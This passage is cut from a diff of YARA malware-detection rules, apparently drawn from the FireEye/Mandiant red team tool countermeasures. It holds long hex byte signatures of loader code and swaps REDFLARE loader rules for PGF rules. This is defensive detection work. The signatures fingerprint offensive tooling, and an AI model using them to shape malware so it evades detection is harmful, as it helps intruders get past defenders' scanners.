D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 E7 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 7A FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 7C AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 62 40 41 6A A1 78 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 6E 40 41 6A 89 04 24 A1 7C A1 41 6A FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 41 6A FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 3C 6A 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 3C 6A 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 55 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 40 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 98 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 F5 BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 6D A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 6E A3 00 00 8D 65 F4 5B 5E 5F 5D C3 } + $cond3 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF F0 EF D5 63 C7 85 30 F9 FF FF CC FF D5 63 8D 85 34 F9 FF FF 89 28 BA 28 1B D4 63 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BF A6 00 00 A1 64 A1 D9 63 C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 BC AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 5A 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 E3 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 56 0B 01 00 A1 68 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 55 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 F3 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 86 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 88 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 7E 40 D9 63 A1 7C A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 8A 40 D9 63 89 04 24 A1 80 A1 D9 63 FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 D9 63 FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 D4 63 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 D4 63 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 61 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 4C 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A4 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 01 BC 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 79 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 7A A3 00 00 8D 65 F4 5B 5E 5F 5D C3 } + $cond4 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? 90 EE 01 6D C7 85 ?? ?? ?? ?? 6C FE 01 6D 8D 85 ?? ?? ?? ?? 89 28 BA CC 19 00 6D 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 0C 40 05 6D A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 18 40 05 6D 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 00 6D 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 00 6D 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 } + $cond5 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? B0 EF 3D 6A C7 85 ?? ?? ?? ?? 8C FF 3D 6A 8D 85 ?? ?? ?? ?? 89 28 BA F4 1A 3C 6A 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 62 40 41 6A A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 6E 40 41 6A 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 3C 6A 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 3C 6A 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 } + $cond6 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? F0 EF D5 63 C7 85 ?? ?? ?? ?? CC FF D5 63 8D 85 ?? ?? ?? ?? 89 28 BA 28 1B D4 63 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 7E 40 D9 63 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 8A 40 D9 63 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 D4 63 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 D4 63 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and any of them } -rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_PGF_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "base dlls: /lib/payload/techniques/unmanaged_exports/" author = "FireEye" - id = "dc162f26-66d3-5359-b1d7-ef2208b359e2" - date = "2020-11-27" - date = "2020-11-27" + id = "1f2280c0-0fdd-5930-947a-931274bccd6f" + date = "2020-11-25" + date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f20824fa6e5c81e3804419f108445368" - logic_hash = "2cae245a6aa36dccc2228cccefdc4ca0eb278901f063e072a369000f67d73a55" + hash = "2b686a8b83f8e1d8b455976ae70dab6e" + logic_hash = "2e84d614c34b0b7f93fa70fa3312f22e3ff23f2abd33b2e19c00dd6cba7dcfdc" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $alloc_n_load = { 41 B9 40 00 00 00 41 B8 00 30 00 00 33 C9 [1-10] FF 50 [4-80] F3 A4 [30-120] 48 6B C9 28 [3-20] 48 6B C9 28 } - $const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A } + $sb1 = { B9 14 00 00 00 FF 15 [4-32] 0F B6 ?? 04 [0-32] F3 A4 [0-64] 0F B6 [2-3] 0F B6 [2-3] 33 [0-32] 88 [1-9] EB } + $sb2 = { 41 B8 00 30 00 00 [0-32] FF 15 [8-64] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [1-64] FF ( D? | 5? ) } + $sb3 = { 48 89 4C 24 08 [4-64] 48 63 48 3C [0-32] 48 03 C1 [0-64] 0F B7 48 14 [0-64] 48 8D 44 08 18 [8-64] 0F B7 40 06 [2-32] 48 6B C0 28 } condition: ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_2 : FILE +rule FIREEYE_RT_APT_Loader_Win32_PGF_5 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "PGF payload, generated rule based on symfunc/a86b004b5005c0bcdbd48177b5bac7b8" author = "FireEye" - id = "043f4e29-710d-5e17-a0ed-82cd3a565194" - date = "2020-11-27" - date = "2020-11-27" + id = "376875f3-00f2-58d0-ae22-7f52ea566da2" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_2.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_5.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = 